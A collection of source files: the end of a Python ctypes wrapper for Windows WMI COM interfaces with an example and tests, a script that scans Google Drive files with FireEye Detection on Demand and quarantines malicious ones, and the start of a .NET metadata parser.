(_Out_, 'ppCallResult'),
)
_DeleteClass = prototype(IWbemServices_DeleteClass_Idx,
'DeleteClass',
paramflags)
_DeleteClass.errcheck = winapi.RAISE_NON_ZERO_ERR
class_param_bstr = winapi.SysAllocString(class_param) if class_param is not None else None
try:
return_obj = _DeleteClass(self.this,
class_param_bstr,
flags,
ctx.this if ctx else None
)
finally:
if class_param_bstr is not None:
winapi.SysFreeString(class_param_bstr)
try:
return_obj = IWbemCallResult(return_obj)
except WindowsError:
return_obj = None
return return_obj
def DeleteClass(self, class_param, flags, ctx):
return_obj = self.DeleteClassWithResult(class_param, flags, ctx)
if return_obj:
return_obj.Release()
def DeleteClassAsync(self, class_param, flags, ctx, response_handler):
prototype = ctypes.WINFUNCTYPE(HRESULT,
BSTR,
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(IWbemObjectSink))
paramflags = ((_In_, 'strClass'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_In_, 'pResponseHandler'),
)
_DeleteClassAsync = prototype(IWbemServices_DeleteClassAsync_Idx,
'DeleteClassAsync',
paramflags)
_DeleteClassAsync.errcheck = winapi.RAISE_NON_ZERO_ERR
class_param_bstr = winapi.SysAllocString(class_param) if class_param is not None else None
try:
_DeleteClassAsync(self.this,
class_param_bstr,
flags,
ctx.this if ctx else None,
response_handler.this if response_handler else None
)
finally:
if class_param_bstr is not None:
winapi.SysFreeString(class_param_bstr)
def CreateClassEnum(self, superclass, flags, ctx):
prototype = ctypes.WINFUNCTYPE(HRESULT,
BSTR,
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'strSuperclass'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_Out_, 'ppEnum'),
)
_CreateClassEnum = prototype(IWbemServices_CreateClassEnum_Idx,
'CreateClassEnum',
paramflags)
_CreateClassEnum.errcheck = winapi.RAISE_NON_ZERO_ERR
superclass_bstr = winapi.SysAllocString(superclass) if superclass is not None else None
try:
return_obj = _CreateClassEnum(self.this,
superclass_bstr,
flags,
ctx.this if ctx else None
)
finally:
if superclass_bstr is not None:
winapi.SysFreeString(superclass_bstr)
try:
return_obj = IEnumWbemClassObject(return_obj)
except WindowsError:
return_obj = None
return return_obj
def CreateClassEnumAsync(self, superclass, flags, ctx, response_handler):
prototype = ctypes.WINFUNCTYPE(HRESULT,
BSTR,
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(IWbemObjectSink))
paramflags = ((_In_, 'strSuperclass'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_In_, 'pResponseHandler'),
)
_CreateClassEnumAsync = prototype(IWbemServices_CreateClassEnumAsync_Idx,
'CreateClassEnumAsync',
paramflags)
_CreateClassEnumAsync.errcheck = winapi.RAISE_NON_ZERO_ERR
superclass_bstr = winapi.SysAllocString(superclass) if superclass is not None else None
try:
_CreateClassEnumAsync(self.this,
superclass_bstr,
flags,
ctx.this if ctx else None,
response_handler.this if response_handler else None
)
finally:
if superclass_bstr is not None:
winapi.SysFreeString(superclass_bstr)
def PutInstanceWithResult(self, inst, flags, ctx):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.POINTER(IWbemClassObject),
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'pInst'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_Out_, 'ppCallResult'),
)
_PutInstance = prototype(IWbemServices_PutInstance_Idx,
'PutInstance',
paramflags)
_PutInstance.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _PutInstance(self.this,
inst.this if inst else None,
flags,
ctx.this if ctx else None
)
try:
return_obj = IWbemCallResult(return_obj)
except WindowsError:
return_obj = None
return return_obj
def PutInstance(self, inst, flags, ctx):
return_obj = self.PutInstanceWithResult(inst, flags, ctx)
if return_obj:
return_obj.Release()
def PutInstanceAsync(self, inst, flags, ctx, response_handler):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.POINTER(IWbemClassObject),
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(IWbemObjectSink))
paramflags = ((_In_, 'pInst'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_In_, 'pResponseHandler'),
)
_PutInstanceAsync = prototype(IWbemServices_PutInstanceAsync_Idx,
'PutInstanceAsync',
paramflags)
_PutInstanceAsync.errcheck = winapi.RAISE_NON_ZERO_ERR
_PutInstanceAsync(self.this,
inst.this if inst else None,
flags,
ctx.this if ctx else None,
response_handler.this if response_handler else None
)
def DeleteInstanceWithResult(self, object_path, flags, ctx):
prototype = ctypes.WINFUNCTYPE(HRESULT,
BSTR,
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'strObjectPath'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_Out_, 'ppCallResult'),
)
_DeleteInstance = prototype(IWbemServices_DeleteInstance_Idx,
'DeleteInstance',
paramflags)
_DeleteInstance.errcheck = winapi.RAISE_NON_ZERO_ERR
object_path_bstr = winapi.SysAllocString(object_path) if object_path is not None else None
try:
return_obj = _DeleteInstance(self.this,
object_path_bstr,
flags,
ctx.this if ctx else None
)
finally:
if object_path_bstr is not None:
winapi.SysFreeString(object_path_bstr)
try:
return_obj = IWbemCallResult(return_obj)
except WindowsError:
return_obj = None
return return_obj
def DeleteInstance(self, object_path, flags, ctx):
return_obj = self.DeleteInstanceWithResult(object_path, flags, ctx)
if return_obj:
return_obj.Release()
def DeleteInstanceAsync(self, object_path, flags, ctx, response_handler):
prototype = ctypes.WINFUNCTYPE(HRESULT,
BSTR,
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(IWbemObjectSink))
paramflags = ((_In_, 'strObjectPath'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_In_, 'pResponseHandler'),
)
_DeleteInstanceAsync = prototype(IWbemServices_DeleteInstanceAsync_Idx,
'DeleteInstanceAsync',
paramflags)
_DeleteInstanceAsync.errcheck = winapi.RAISE_NON_ZERO_ERR
object_path_bstr = winapi.SysAllocString(object_path) if object_path is not None else None
try:
_DeleteInstanceAsync(self.this,
object_path_bstr,
flags,
ctx.this if ctx else None,
response_handler.this if response_handler else None
)
finally:
if object_path_bstr is not None:
winapi.SysFreeString(object_path_bstr)
def CreateInstanceEnum(self, filter_param, flags, ctx):
prototype = ctypes.WINFUNCTYPE(HRESULT,
BSTR,
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'strFilter'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_Out_, 'ppEnum'),
)
_CreateInstanceEnum = prototype(IWbemServices_CreateInstanceEnum_Idx,
'CreateInstanceEnum',
paramflags)
_CreateInstanceEnum.errcheck = winapi.RAISE_NON_ZERO_ERR
filter_param_bstr = winapi.SysAllocString(filter_param) if filter_param is not None else None
try:
return_obj = _CreateInstanceEnum(self.this,
filter_param_bstr,
flags,
ctx.this if ctx else None
)
finally:
if filter_param_bstr is not None:
winapi.SysFreeString(filter_param_bstr)
try:
return_obj = IEnumWbemClassObject(return_obj)
except WindowsError:
return_obj = None
return return_obj
def CreateInstanceEnumAsync(self, filter_param, flags, ctx, response_handler):
prototype = ctypes.WINFUNCTYPE(HRESULT,
BSTR,
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(IWbemObjectSink))
paramflags = ((_In_, 'strFilter'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_In_, 'pResponseHandler'),
)
_CreateInstanceEnumAsync = prototype(IWbemServices_CreateInstanceEnumAsync_Idx,
'CreateInstanceEnumAsync',
paramflags)
_CreateInstanceEnumAsync.errcheck = winapi.RAISE_NON_ZERO_ERR
filter_param_bstr = winapi.SysAllocString(filter_param) if filter_param is not None else None
try:
_CreateInstanceEnumAsync(self.this,
filter_param_bstr,
flags,
ctx.this if ctx else None,
response_handler.this if response_handler else None
)
finally:
if filter_param_bstr is not None:
winapi.SysFreeString(filter_param_bstr)
def ExecQuery(self, query_language, query, flags, ctx):
prototype = ctypes.WINFUNCTYPE(HRESULT,
BSTR,
BSTR,
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'strQueryLanguage'),
(_In_, 'strQuery'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_Out_, 'ppEnum'),
)
_ExecQuery = prototype(IWbemServices_ExecQuery_Idx,
'ExecQuery',
paramflags)
_ExecQuery.errcheck = winapi.RAISE_NON_ZERO_ERR
query_language_bstr = winapi.SysAllocString(query_language) if query_language is not None else None
query_bstr = winapi.SysAllocString(query) if query is not None else None
try:
return_obj = _ExecQuery(self.this,
query_language_bstr,
query_bstr,
flags,
ctx.this if ctx else None
)
finally:
if query_language_bstr is not None:
winapi.SysFreeString(query_language_bstr)
if query_bstr is not None:
winapi.SysFreeString(query_bstr)
try:
return_obj = IEnumWbemClassObject(return_obj)
except WindowsError:
return_obj = None
return return_obj
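    # Illustrative sketch (not part of the original source): running a WQL
    # query against an IWbemServices instance named `services` and fetching
    # the first result.
    #   enum = services.ExecQuery('WQL', 'SELECT * FROM Win32_Process', 0, None)
    #   obj = enum.Next(-1)   # -1 is WBEM_INFINITE; returns an IWbemClassObject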
def ExecQueryAsync(self, query_language, query, flags, ctx, response_handler):
prototype = ctypes.WINFUNCTYPE(HRESULT,
BSTR,
BSTR,
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(IWbemObjectSink))
paramflags = ((_In_, 'strQueryLanguage'),
(_In_, 'strQuery'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_In_, 'pResponseHandler'),
)
_ExecQueryAsync = prototype(IWbemServices_ExecQueryAsync_Idx,
'ExecQueryAsync',
paramflags)
_ExecQueryAsync.errcheck = winapi.RAISE_NON_ZERO_ERR
query_language_bstr = winapi.SysAllocString(query_language) if query_language is not None else None
query_bstr = winapi.SysAllocString(query) if query is not None else None
try:
_ExecQueryAsync(self.this,
query_language_bstr,
query_bstr,
flags,
ctx.this if ctx else None,
response_handler.this if response_handler else None
)
finally:
if query_language_bstr is not None:
winapi.SysFreeString(query_language_bstr)
if query_bstr is not None:
winapi.SysFreeString(query_bstr)
def ExecNotificationQuery(self, query_language, query, flags, ctx):
prototype = ctypes.WINFUNCTYPE(HRESULT,
BSTR,
BSTR,
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'strQueryLanguage'),
(_In_, 'strQuery'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_Out_, 'ppEnum'),
)
_ExecNotificationQuery = prototype(IWbemServices_ExecNotificationQuery_Idx,
'ExecNotificationQuery',
paramflags)
_ExecNotificationQuery.errcheck = winapi.RAISE_NON_ZERO_ERR
query_language_bstr = winapi.SysAllocString(query_language) if query_language is not None else None
query_bstr = winapi.SysAllocString(query) if query is not None else None
try:
return_obj = _ExecNotificationQuery(self.this,
query_language_bstr,
query_bstr,
flags,
ctx.this if ctx else None
)
finally:
if query_language_bstr is not None:
winapi.SysFreeString(query_language_bstr)
if query_bstr is not None:
winapi.SysFreeString(query_bstr)
try:
return_obj = IEnumWbemClassObject(return_obj)
except WindowsError:
return_obj = None
return return_obj
def ExecNotificationQueryAsync(self, query_language, query, flags, ctx, response_handler):
prototype = ctypes.WINFUNCTYPE(HRESULT,
BSTR,
BSTR,
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(IWbemObjectSink))
paramflags = ((_In_, 'strQueryLanguage'),
(_In_, 'strQuery'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_In_, 'pResponseHandler'),
)
_ExecNotificationQueryAsync = prototype(IWbemServices_ExecNotificationQueryAsync_Idx,
'ExecNotificationQueryAsync',
paramflags)
_ExecNotificationQueryAsync.errcheck = winapi.RAISE_NON_ZERO_ERR
query_language_bstr = winapi.SysAllocString(query_language) if query_language is not None else None
query_bstr = winapi.SysAllocString(query) if query is not None else None
try:
_ExecNotificationQueryAsync(self.this,
query_language_bstr,
query_bstr,
flags,
ctx.this if ctx else None,
response_handler.this if response_handler else None
)
finally:
if query_language_bstr is not None:
winapi.SysFreeString(query_language_bstr)
if query_bstr is not None:
winapi.SysFreeString(query_bstr)
def ExecMethodWithResult(self, object_path, method_name, flags, ctx, in_params):
prototype = ctypes.WINFUNCTYPE(HRESULT,
BSTR,
BSTR,
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(IWbemClassObject),
ctypes.POINTER(wintypes.LPVOID),
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'strObjectPath'),
(_In_, 'strMethodName'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_In_, 'pInParams'),
(_Out_, 'ppOutParams'),
(_Out_, 'ppCallResult'),
)
_ExecMethod = prototype(IWbemServices_ExecMethod_Idx,
'ExecMethod',
paramflags)
_ExecMethod.errcheck = winapi.RAISE_NON_ZERO_ERR
object_path_bstr = winapi.SysAllocString(object_path) if object_path is not None else None
method_name_bstr = winapi.SysAllocString(method_name) if method_name is not None else None
try:
return_obj, return_obj2 = _ExecMethod(self.this,
object_path_bstr,
method_name_bstr,
flags,
ctx.this if ctx else None,
in_params.this if in_params else None
)
finally:
if object_path_bstr is not None:
winapi.SysFreeString(object_path_bstr)
if method_name_bstr is not None:
winapi.SysFreeString(method_name_bstr)
try:
return_obj = IWbemClassObject(return_obj)
except WindowsError:
return_obj = None
try:
return_obj2 = IWbemCallResult(return_obj2)
except WindowsError:
return_obj2 = None
return return_obj, return_obj2
def ExecMethod(self, object_path, method_name, flags, ctx, in_params):
return_obj, return_obj2 = self.ExecMethodWithResult(object_path, method_name, flags, ctx, in_params)
if return_obj2:
return_obj2.Release()
return return_obj
def ExecMethodAsync(self, object_path, method_name, flags, ctx, in_params, response_handler):
prototype = ctypes.WINFUNCTYPE(HRESULT,
BSTR,
BSTR,
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(IWbemClassObject),
ctypes.POINTER(IWbemObjectSink))
paramflags = ((_In_, 'strObjectPath'),
(_In_, 'strMethodName'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_In_, 'pInParams'),
(_In_, 'pResponseHandler'),
)
_ExecMethodAsync = prototype(IWbemServices_ExecMethodAsync_Idx,
'ExecMethodAsync',
paramflags)
_ExecMethodAsync.errcheck = winapi.RAISE_NON_ZERO_ERR
object_path_bstr = winapi.SysAllocString(object_path) if object_path is not None else None
method_name_bstr = winapi.SysAllocString(method_name) if method_name is not None else None
try:
_ExecMethodAsync(self.this,
object_path_bstr,
method_name_bstr,
flags,
ctx.this if ctx else None,
in_params.this if in_params else None,
response_handler.this if response_handler else None
)
finally:
if object_path_bstr is not None:
winapi.SysFreeString(object_path_bstr)
if method_name_bstr is not None:
winapi.SysFreeString(method_name_bstr)
IWbemLocator_ConnectServer_Idx = 3
class IWbemLocator(com.IUnknown):
def ConnectServer(self, network_resource, user, password, locale, security_flags, authority, ctx):
prototype = ctypes.WINFUNCTYPE(HRESULT,
BSTR,
BSTR,
BSTR,
BSTR,
ctypes.c_long,
BSTR,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'strNetworkResource'),
(_In_, 'strUser'),
(_In_, 'strPassword'),
(_In_, 'strLocale'),
(_In_, 'lSecurityFlags'),
(_In_, 'strAuthority'),
(_In_, 'pCtx'),
(_Out_, 'ppNamespace'),
)
_ConnectServer = prototype(IWbemLocator_ConnectServer_Idx,
'ConnectServer',
paramflags)
_ConnectServer.errcheck = winapi.RAISE_NON_ZERO_ERR
network_resource_bstr = winapi.SysAllocString(network_resource) if network_resource is not None else None
user_bstr = winapi.SysAllocString(user) if user is not None else None
password_bstr = winapi.SysAllocString(password) if password is not None else None
locale_bstr = winapi.SysAllocString(locale) if locale is not None else None
authority_bstr = winapi.SysAllocString(authority) if authority is not None else None
try:
return_obj = _ConnectServer(self.this,
network_resource_bstr,
user_bstr,
password_bstr,
locale_bstr,
security_flags,
authority_bstr,
ctx.this if ctx else None
)
finally:
if network_resource_bstr is not None:
winapi.SysFreeString(network_resource_bstr)
if user_bstr is not None:
winapi.SysFreeString(user_bstr)
if password_bstr is not None:
winapi.SysFreeString(password_bstr)
if locale_bstr is not None:
winapi.SysFreeString(locale_bstr)
if authority_bstr is not None:
winapi.SysFreeString(authority_bstr)
try:
return_obj = IWbemServices(return_obj)
except WindowsError:
return_obj = None
return return_obj
class WMI(com.COM):
'''
Wrapper class for WMI interactions. WMI initialization / uninitialization are done via ctxmgr.
    N.B. If using this class, do not call init() and fini() directly. Only use it via the context manager.
'''
def __init__(self,
net_resource,
user=None,
                 password=None,
locale=None,
sec_flags=0,
auth=None,
ctx=None,
cls_ctx=com.CLSCTX_INPROC_SERVER,
authn_svc=winapi.RPC_C_AUTHN_WINNT,
authz_svc=winapi.RPC_C_AUTHZ_NONE,
spn=None,
auth_info=None,
coinit=com.COINIT_MULTITHREADED,
authn_level=winapi.RPC_C_AUTHN_LEVEL_DEFAULT,
imp_level=winapi.RPC_C_IMP_LEVEL_IMPERSONATE,
auth_list=None,
capabilities=winapi.EOAC_NONE):
self._net_resource = net_resource
self._user = user
self._password = password
self._locale = locale
self._sec_flags = sec_flags
self._auth = auth
self._ctx = ctx
self._cls_ctx = cls_ctx
self._authn_svc = authn_svc
self._authz_svc = authz_svc
self._spn = spn
self._auth_info = auth_info
self._authn_level = authn_level
self._imp_level = imp_level
self._auth_list = auth_list
self._capabilities = capabilities
self.service = None
super(WMI, self).__init__(coinit)
def __enter__(self):
self.init()
return self.service
def __exit__(self, exc_type, exc_val, exc_tb):
self.fini()
def init(self):
super(WMI, self).init()
self.initialize_security(None,
-1,
None,
self._authn_level,
self._imp_level,
self._auth_list,
self._capabilities)
locator = self.create_instance(winapi.CLSID_WbemLocator,
None,
self._cls_ctx,
winapi.IID_IWbemLocator,
IWbemLocator)
try:
self.service = locator.ConnectServer(self._net_resource,
self._user,
self._password,
self._locale,
self._sec_flags,
self._auth,
self._ctx)
finally:
locator.Release()
self.set_proxy_blanket(self.service.this,
self._authn_svc,
self._authz_svc,
self._spn,
self._authn_level,
self._imp_level,
self._auth_info,
self._capabilities)
def fini(self):
while self.service.Release():
pass
super(WMI, self).fini()
```
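For orientation, a minimal usage sketch of the wrapper above. The `root\cimv2` namespace also appears in the bundled example and tests; the WQL query text and the zero flags value are assumptions, not documented defaults.

```python
# Sketch only: the query text and flags=0 are assumptions.
from cwmi import wmi

with wmi.WMI('root\\cimv2') as svc:
    # svc is the IWbemServices instance returned by IWbemLocator.ConnectServer()
    enum = svc.ExecQuery('WQL', 'SELECT Name FROM Win32_Process', 0, None)
    if enum:
        enum.Release()
```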
#### File: cWMI/examples/create_process.py
```python
import argparse
import cwmi
def create_process(path):
out = cwmi.call_method('root\\cimv2', 'Win32_Process', 'Create', {'CommandLine': path})
ret = out['ReturnValue']
if not ret:
print('Process created successfully with process id of {:d}'.format(out['ProcessId']))
else:
print('Process not created successfully, ERROR is {:d}'.format(ret))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--path', help='Full path to executable', required=True)
parsed_args = parser.parse_args()
create_process(parsed_args.path)
```
#### File: cWMI/tests/test_com.py
```python
import unittest
from cwmi import com
from cwmi import wmi
from cwmi import winapi
class TestCOM(unittest.TestCase):
def setUp(self):
self.instance = com.COM()
self.instance.init()
self.instance.initialize_security()
def tearDown(self):
self.instance.fini()
def test_iunknown(self):
"""
Tests the IUnknown interface
:return: None
"""
obj = self.instance.create_instance(winapi.CLSID_WbemLocator,
None,
com.CLSCTX_INPROC_SERVER,
winapi.IID_IWbemLocator,
com.IUnknown)
obj.QueryInterface(winapi.IID_IWbemLocator)
count = obj.AddRef()
assert count == 3
count = obj.Release()
assert count == 2
count = obj.Release()
assert count == 1
count = obj.Release()
assert count == 0
def test_com_create_instance(self):
"""
Tests the ability to create a COM object instance
:return: None
"""
obj = self.instance.create_instance(winapi.CLSID_WbemLocator,
None,
com.CLSCTX_INPROC_SERVER,
winapi.IID_IWbemLocator,
wmi.IWbemLocator)
assert obj.Release() == 0
def test_com_set_proxy_blanket(self):
"""
Tests the ability to set security on object
:return: None
"""
locator = self.instance.create_instance(winapi.CLSID_WbemLocator,
None,
com.CLSCTX_INPROC_SERVER,
winapi.IID_IWbemLocator,
wmi.IWbemLocator)
assert locator.this
svc = locator.ConnectServer('root\\cimv2', None, None, None, 0, None, None)
assert svc.this
self.instance.set_proxy_blanket(svc.this)
assert locator.Release() == 0
assert svc.Release() == 0
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "4k4xs4pH1r3/dod-example-apps",
"score": 2
} |
#### File: dod-example-apps/google_drive/google_drive_detection_threaded.py
```python
from __future__ import print_function
import fireeyepy
import concurrent.futures
import json
from datetime import datetime
import pickle
import time
import os.path
from io import BytesIO
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from googleapiclient.http import MediaIoBaseDownload
from googleapiclient.discovery import build
import secrets
WORKER_THREADS=5 # Be careful how many threads you spawn to avoid reaching API rate limits
DOD_API_KEY = secrets.keys['DOD_API_KEY']
REPORT_RETRY_TIME = 5 # Wait 'n' seconds between each poll to the /reports endpoint to get the status of file reports
DOD_FILE_SIZE_LIMIT = 32000000 # 32 MB in SI units. Files larger than this won't be downloaded from GDrive since DoD won't accept them.
QUARANTINE_FOLDER_NAME = "Quarantine" # Name of the folder to put malicious files in. If this folder doesn't exist, the script will create it.
SCOPES = ['https://www.googleapis.com/auth/drive']
# Initialize credentials for Google API (https://developers.google.com/drive/api/v3/quickstart/python?authuser=1)
def initGoogleCreds():
# Authorize with Google Drive
creds = None
if os.path.exists('token.pickle'):
with open('token.pickle', 'rb') as token:
creds = pickle.load(token)
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
'./credentials.json', SCOPES)
creds = flow.run_local_server(port=8080)
with open('token.pickle', 'wb') as token:
pickle.dump(creds, token)
return creds
# Get the id of the folder that will be used to quarantine malicious files. If it doesn't exist, create it.
def initQuarantineFolder(google_service, name=QUARANTINE_FOLDER_NAME):
# Get the quarantine folder iD. If it doesn't exist, create it.
results = google_service.files().list(q="mimeType='application/vnd.google-apps.folder' and name='{}'".format(name),
spaces='drive',
fields='files(id)').execute()
folders = results.get('files', [])
if len(folders) > 0:
quarantine_folder_id = folders[0]["id"]
else:
# Create the Quarantine folder
file_metadata = {
'name': name,
'mimeType': 'application/vnd.google-apps.folder'
}
folder = google_service.files().create(body=file_metadata, fields='id').execute()
quarantine_folder_id = folder.get('id')
return quarantine_folder_id
# Get a list of files in the drive account. Exclude folders, files in the trash, and files in the Quarantine folder
# Only return files that have been CREATED at or after the supplied timestamp. Follow pagination to get every file
# that meets these conditions.
def getFiles(google_service, includeTrash=False, excludedFolderIDs=[], createdAfterTime=""):
query = "mimeType != 'application/vnd.google-apps.folder' and trashed = {}".format(includeTrash)
    # Add excluded folders to the query
for id in excludedFolderIDs:
query += " and not '{}' in parents".format(id)
# Only return files created after the specified date. If no date provided, get all files.
if createdAfterTime:
query += " and createdTime > '{}'".format(createdAfterTime)
result = []
page_token = None
while True:
param = {
'q': query,
'pageSize': 1000, # Maximum supported by Drive API
'fields': "nextPageToken, files(id, name, mimeType, size)"
}
if page_token:
param['pageToken'] = page_token
files = google_service.files().list(**param).execute()
result.extend(files['files'])
page_token = files.get('nextPageToken')
if not page_token:
break
return result
# Download the file from Google Drive and submit to DoD for malware scanning.
def downloadAndScanFile(creds, detection_client, file, quarantine_folder_id):
google_service = build('drive', 'v3', credentials=creds)
try:
request = google_service.files().get_media(fileId=file["id"])
# Keep the files in memory instead of saved to disk since we need to upload to DoD
fh = BytesIO()
downloader = MediaIoBaseDownload(fh, request)
downloader.next_chunk(num_retries=1)
print(f"Downloaded from GDrive: {file}")
# Submit file handler to DoD for scanning.
response = detection_client.submit_file(
files={
"file": (file["name"], fh.getvalue())
}
)
if response["status"] == "success":
quarantineMaliciousFile(google_service, detection_client, response["report_id"], file["id"], quarantine_folder_id)
except Exception as e:
print(e)
# Continuously poll the report until it is done and returns a verdict. If the file is malicious, then move
# it to the designated quarantine folder.
def quarantineMaliciousFile(google_service, detection_client, report_id, file_id, quarantine_folder_id):
print(f"Checking report {report_id}")
try:
report = detection_client.get_report(report_id)
while report["overall_status"] != "DONE":
time.sleep(REPORT_RETRY_TIME) # Wait a little bit to allow the detection engine to finish the report
report = detection_client.get_report(report_id)
if report["is_malicious"]:
print(f'{report["file_name"]} is malicious. Moving to {QUARANTINE_FOLDER_NAME}.')
# Retrieve the existing parents folder to be removed
file = google_service.files().get(fileId=file_id,
fields='parents').execute()
previous_parents = ",".join(file.get('parents'))
# Move the file to the new folder
file = google_service.files().update(fileId=file_id,
addParents=quarantine_folder_id,
removeParents=previous_parents,
fields='id, parents').execute()
except fireeyepy.ClientError as e:
print(e)
def main(settings):
detection_client = fireeyepy.Detection(key=DOD_API_KEY)
creds = initGoogleCreds()
google_service = build('drive', 'v3', credentials=creds)
quarantine_folder_id = initQuarantineFolder(google_service)
# Get the time this script was last run so we only get files from Google Drive that have been created since the last run
lastRunAt = ""
if settings['lastRunAt']:
lastRunAt = settings['lastRunAt']
else:
settings['lastRunAt'] = "" # Initialize the lastRunAt setting so we can update it later
    # The line below only scans new files (created since the last run)
files = getFiles(google_service, excludedFolderIDs=[quarantine_folder_id], createdAfterTime=lastRunAt)
# Uncomment below line to scan all files
# files = getFiles(google_service, excludedFolderIDs=[quarantine_folder_id])
with concurrent.futures.ThreadPoolExecutor(max_workers=WORKER_THREADS) as executor:
for file in files:
if "size" in file:
if int(file["size"]) <= DOD_FILE_SIZE_LIMIT:
# Create a new google service object for each thread since it isn't thread safe. Based on this issue (https://github.com/googleapis/google-api-python-client/issues/626)
executor.submit(downloadAndScanFile, creds, detection_client, file, quarantine_folder_id)
else:
print(f'Skipping file {file["name"]} since it is greater than the DoD file size limit.')
else:
print(f'Skipping file {file["name"]} since it is most likely a shared file not owned by the user.')
if __name__ == '__main__':
# Read in the settings file
with open('settings.json') as json_file:
settings = json.load(json_file)
start_time = time.time()
main(settings)
print(f"--- {(time.time() - start_time)} seconds ---")
# Upon successful completion of the script, update the lastRunAt setting. If the script
# fails, then this won't execute so we can fix the issue and retry without missing any files.
settings['lastRunAt'] = datetime.utcnow().isoformat().split('.')[0] # Split on the period to remove the milliseconds
with open('settings.json', 'w') as outfile:
json.dump(settings, outfile)
``` |
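The script assumes a settings.json sitting next to it with at least a lastRunAt key (read in `__main__` above and rewritten on success). A minimal way to bootstrap that file, sketched here on the assumption that lastRunAt is the only required key:

```python
# Sketch: create an initial settings.json with an empty lastRunAt so the
# first run scans every file; 'lastRunAt' is the only key the script reads.
import json

with open('settings.json', 'w') as outfile:
    json.dump({'lastRunAt': ''}, outfile)
```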
{
"source": "4k4xs4pH1r3/jitm",
"score": 2
} |
#### File: jitm/Scripts/pydnet.py
```python
import pefile
import struct
import logging
from vstruct import VStruct, primitives as vp
DWORD_SIZE = 4
DNT_Module = 0
DNT_TypeRef = 1
DNT_TypeDef = 2
DNT_Field = 4
DNT_MethodDef = 6
DNT_Param = 8
DNT_InterfaceImpl = 9
DNT_MemberRef = 10
DNT_Constant = 11
DNT_CustomAttribute = 12
DNT_FieldMarshal = 13
DNT_DeclSecurity = 14
DNT_ClassLayout = 15
DNT_FieldLayout = 16
DNT_StandAloneSig = 17
DNT_EventMap = 18
DNT_Event = 20
DNT_PropertyMap = 21
DNT_Property = 23
DNT_MethodSemantics = 24
DNT_MethodImpl = 25
DNT_ModuleRef = 26
DNT_TypeSpec = 27
DNT_ImplMap = 28
DNT_FieldRVA = 29
DNT_Assembly = 32
DNT_AssemblyProcessor = 33
DNT_AssemblyOS = 34
DNT_AssemblyRef = 35
DNT_AssemblyRefProcessor = 36
DNT_AssemblyRefOS = 37
DNT_File = 38
DNT_ExportedType = 39
DNT_ManifestResource = 40
DNT_NestedClass = 41
DNT_GenericParam = 42
DNT_MethodSpec = 43
DNT_GenericParamConstraint = 44
DNT_Types = [
DNT_Module,
DNT_TypeRef,
DNT_TypeDef,
DNT_Field,
DNT_MethodDef,
DNT_Param,
DNT_InterfaceImpl,
DNT_MemberRef,
DNT_Constant,
DNT_CustomAttribute,
DNT_FieldMarshal,
DNT_DeclSecurity,
DNT_ClassLayout,
DNT_FieldLayout,
DNT_StandAloneSig,
DNT_EventMap,
DNT_Event,
DNT_PropertyMap,
DNT_Property,
DNT_MethodSemantics,
DNT_MethodImpl,
DNT_ModuleRef,
DNT_TypeSpec,
DNT_ImplMap,
DNT_FieldRVA,
DNT_Assembly,
DNT_AssemblyProcessor,
DNT_AssemblyOS,
DNT_AssemblyRef,
DNT_AssemblyRefProcessor,
DNT_AssemblyRefOS,
DNT_File,
DNT_ExportedType,
DNT_ManifestResource,
DNT_NestedClass,
DNT_GenericParam,
DNT_MethodSpec,
DNT_GenericParamConstraint,
]
DNT_Names = {
DNT_Module: 'DNT_Module',
DNT_TypeRef: 'DNT_TypeRef',
DNT_TypeDef: 'DNT_TypeDef',
DNT_Field: 'DNT_Field',
DNT_MethodDef: 'DNT_MethodDef',
DNT_Param: 'DNT_Param',
DNT_InterfaceImpl: 'DNT_InterfaceImpl',
DNT_MemberRef: 'DNT_MemberRef',
DNT_Constant: 'DNT_Constant',
